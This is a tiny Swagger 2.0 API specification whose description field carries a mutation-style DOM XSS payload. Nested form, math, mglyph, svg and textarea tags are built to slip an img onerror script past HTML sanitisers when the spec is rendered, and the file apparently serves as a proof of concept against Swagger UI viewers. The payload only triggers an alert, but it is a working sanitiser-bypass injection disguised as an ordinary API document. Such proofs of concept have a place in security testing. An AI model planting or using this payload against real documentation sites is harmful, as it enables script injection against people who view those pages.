swagger: '2.0' 
info: 
  title: YUDoThisCELFOCUS | Z'R0 
  description: | 
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('DOM-XSS') src=1>"></form> 
  version: production 
basePath: /JSSResource/ 
produces: 
  - application/xml 
  - application/json 
consumes: 
  - application/xml 
  - application/json 
security: 
  - basicAuth: [] 
paths: 
  /: 
    get: 
      responses: 
        200: 
          description: YUDoThisCELFOCUS | Z'R0
